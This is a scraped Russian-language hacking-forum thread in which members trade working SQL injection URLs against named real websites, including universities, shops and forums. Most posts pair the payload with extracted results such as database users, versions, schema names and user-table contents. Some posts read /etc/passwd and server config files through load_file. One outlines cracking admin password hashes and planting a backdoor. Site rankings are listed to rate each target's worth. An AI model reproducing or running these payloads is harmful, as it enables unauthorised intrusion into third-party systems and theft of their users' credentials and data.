SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Тоже поддержу edu-тематикой :)

    ТИЦ == 20, PR == 6, DMOZ == true;

    PHP:
    http://www.gcu.edu/faculty-bio.php?fid=-777777777777'+union+select+1,2,concat_ws(0x03a,database(),user(),version()),4,5,6,7,8,9,10,11,12--+h
     
    2 people like this.
  2. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    558
    Likes Received:
    289
    Reputations:
    42
    Code:
    http://amanday.org.ua/bands/detail.php?id=0+union+select+1,2,3,concat_ws(0x3a,login,password),5,6,7+from+user_data--+
    
    http://list.nsklife.ru/?q=catalog&cat=3'and+1=2+union+select+1,version(),3--+
     
    2 people like this.
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    Информационный портал Всероссийской олимпиады школьников
    PR:5 ТИЦ:325 ALEXA:402071
    http://rosolymp.ru//index.php?option=com_myblog&category=acab'+union+select+/*!concat((select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x))*/++--+'
     
    _________________________
    4 people like this.
  4. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    PR=4
    PR=5
     
    _________________________
    #14984 VY_CMa, 11 Jun 2012
    Last edited: 11 Jun 2012
    2 people like this.
  5. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Почти как наш отечественный фриланс, лол.

    PHP:
    http://free-lance.us/index.php?CatId=1+and+(select+1+from(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
     
    2 people like this.
  6. Sidarovich1975

    Joined:
    4 Oct 2009
    Messages:
    60
    Likes Received:
    16
    Reputations:
    7
    inj:
    user-version-data:
    load_file:
     
    2 people like this.
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    premiumseeds.ru

    PHP:
    http://premiumseeds.ru/?show=s_cat&id=181+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
    5.1.47-log
    Яндекс тИЦ (CY) 0
    Alexa Rank 0
    Google PageRank (PR) 0

    ------------------------------------------------------------------------------------
    priceinkerala.com


    PHP:
    http://www.priceinkerala.com/compa.php?id=-235+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+
    5.0.95-community
    Яндекс тИЦ (CY) 0
    Alexa Rank 0
    Google PageRank (PR) 1

    -----------------------------------------------------------------------------------
    pakwatan.com

    PHP:
    http://www.pakwatan.com/pakwaan_detail.php?id=50+or+1+group+by+concat((select+user+from+mysql.user()),0x00,floor(rand(0)*2))having+min(0)+or+1--+

    5.1.61-community-log
    Яндекс тИЦ (CY) 0
    Alexa Rank 323,035 -482,975
    Google PageRank (PR) 4

    -----------------------------------------------------------------------------------
    pizzifarm.com


    PHP:
    http://www.pizzifarm.com/index.php?id=5+or+1+group+by+concat((select+version()),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    4.1.20
    Яндекс тИЦ (CY) 0
    Alexa Rank 8,502,816 +1,801,629
    Google PageRank (PR) 2

    -----------------------------------------------------------------------------------
    npwrinc.com


    PHP:
    http://www.inpwrinc.com/prcomp.php?id=5'+or+1+group+by+concat((select+user+from+mysql.user),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    5.1.31
    Яндекс тИЦ (CY) 0
    Alexa Rank 23,048,448
    Google PageRank (PR) 2

    -----------------------------------------------------------------------------------
     
    3 people like this.
  8. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    PR == 4;

    PHP:
    http://www1.plurib.us/?year=-2006+union+select+1,2,concat_ws(0x03a,id,username,password,usertype),4,5,6,7,8,9,10+from+plurib_joomla_prod.jos_users--
     
    2 people like this.
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Гарвард

    Тиц 3000
    PR 8

    13 800 000 страниц в Гугле

    PostgreSQL не могу дальше раскрутить.
     
    _________________________
    2 people like this.
  10. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    720
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.strategicvision.com/press_release.php?[COLOR=Red]pr=[/COLOR]39+and+2=1+/*!union*/+/*!select*/+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8--
    Username: strategi_web@localhost
    Version: 5.0.77
    Database: strategi_website

    Google PR: 4
     
    1 person likes this.
  11. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://infomedfarmdialog[dot]ru/?module=video_archive&event_id=1+and+0+union+all+select+(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=0x7777776c6f6d6261726430317275)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)--+
    User: [email protected]
    Database: wwwlombard01ru
    Version: 5.1.58-log


    PR - 4
    CY - 140
     
    #14991 cat1vo, 12 Jun 2012
    Last edited: 12 Jun 2012
    4 people like this.
  12. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    ТИЦ == 10, PR == 4, AR ==11,040, трафф.

    Число зарегистрированных пользователей сайта == 50674

    PHP:
    http://officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6,7,8+from+users--+h
    Число зарегистрированных пользователей форума == 48040

    PHP:
    http://officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6,7,8+from+_vb_user--+h
     
    2 people like this.
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Крутая ситуация) У тебя скулья с LFI. Инклюдится пятая колонка:
    Code:
    http://www.azalsigorta.com/?mod=1'+union(select+1,2,3,4[COLOR=Red],0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764[/COLOR])--+f
    Результат:
    Code:
    root:x:0:0:root:/root:/bin/bash 
    bin:x:1:1:bin:/bin:/sbin/nologin
    ....
    Где 0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 это ../../../../../etc/passwd.

    UPD.
    Code:
    http://www.azalsigorta.com/?mod=1'+union(select+1,2,version(),4,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)--+f
    В самом низу
    Code:
    Fatal error: Class '[COLOR=SandyBrown]5.5.23-55[/COLOR]' not found in /home/azalsigo/public_html/library/core/Core.class.php on line 19
    
    Удачи!
     
    5 people like this.
  14. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    PR == 4;

    PHP:
    http://www.c-registry.us/pages/index.php?pID=77777777'+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3--+h
    PR == 3;

    PHP:
    http://www.deals365.us/category.php?catid=-174+union+select+1,version(),3,4--
     
    #14994 Га-Ноцри, 13 Jun 2012
    Last edited: 13 Jun 2012
  15. dutch

    dutch New Member

    Joined:
    7 Jun 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    тИЦ == 10
    PR == 1

    PHP:
    http://ventura.rudtp.ru/articles.php?id=4+union+sele.ct+1,2,3,GROUP_CONCAT(table_name,0x0a)+from+information_schema.  tables+--
     
  16. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    PHP:
    http://www.ubytok.ru/faq?cat_id=1 and 0 union all select 1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=0x617a62756b61737a5f756279746f6b)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),0--
    User: azbukasz_ubytok@localhost
    Database: azbukasz_ubytok
    Version: 5.1.58


    PR - 2
    CY - 30

    PHP:
    http://www.crisis.ru/links.php?catid=1'+or+1+group+by+mid(version(),rand(0)|0,64)+having+avg(0)--+
    User: bankrot@localhost
    Database: bankrot
    Version: 5.0.95


    PR - 4
    CY - 50
     
  17. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    558
    Likes Received:
    289
    Reputations:
    42

    http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+from(select+count(*),concat(version(),floor(rand(0)|0))x+from+information_schema.tables+group+by+2)a+where(1=1)

    http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,user_password)from+phpbb_users+limit+1,1),floor(rand(0)|0))x+from+information_schema.tables+group+by+2)a+where(1=1)
    1. Login:md5 —> расшифровываем
    2. Админка: /admin/
    3. Делаем ретрив бд
    4. Получаем бекдор в профиле

    PR: 5
    Pages: 4 430 000

    CY: 425
    Pages: 379 000

    DMOZ: Y
    Траф: 54 000
     
  18. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    украинский датинг, жаль народа мало:

     
  19. eregis

    eregis Member

    Joined:
    15 Jul 2010
    Messages:
    104
    Likes Received:
    5
    Reputations:
    -5
    HTML:
    http://sport-lights.ru/dir.php?id=-2+union+select+1,2,3,4,5,6,7,group_concat(schema_name+separator+0x3C62723E),9,10,11+from+information_schema.schemata--
    Bases:
    information_schema
    allrecords
    autonews
    avtobang
    avtobudget
    avtoclubber
    avtogramma
    avtokarton
    basket-team
    basketblog
    biatlonblog
    bombnews
    club
    dating
    doyouknow
    engfootball
    engfutbolist
    epigraf
    flagi
    flashgames
    footballblog
    francefoot
    francefootball
    gerfoot
    gerfootball
    incognita
    ingectors
    italfoot
    italyfootball
    kinofreaks
    kinopazl
    kzu
    lyrics
    memorygame
    netnewsmaker
    nobel
    poller
    relaxat
    rossfoot
    rusfootball
    spainfoot
    spainfootball
    sportemblem
    sportnews
    trenerchgk
    turkfootball
    twichange
    ukrfoot
    ukrfootball
    viktorina

    Мне не интересны..
     
  20. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    etuners.gr/en/index.php?s=13&t=296+UNION+SELECT+1,2,3,concat(user(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+limit+1,1--


    nzho.ru/catalog.php?id=137+union+select+1,concat(user(),version()),3,4,5+limit+1,1--


    wellydiecast.com/product_list.php?id=1+UNION+SELECT+concat(user(),version())+LIMIT+1,1--


    operalane.com/shop.php?item_id=15+union+select+1,(user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15+limit+1,1--


    www.skyproairsoft.com/news_detail.php?id=5+UNION+SELECT+concat%28user%28%29,version%28%29%29,2,3,4+LIMIT+1,1--
     
Thread Status:
Not open for further replies.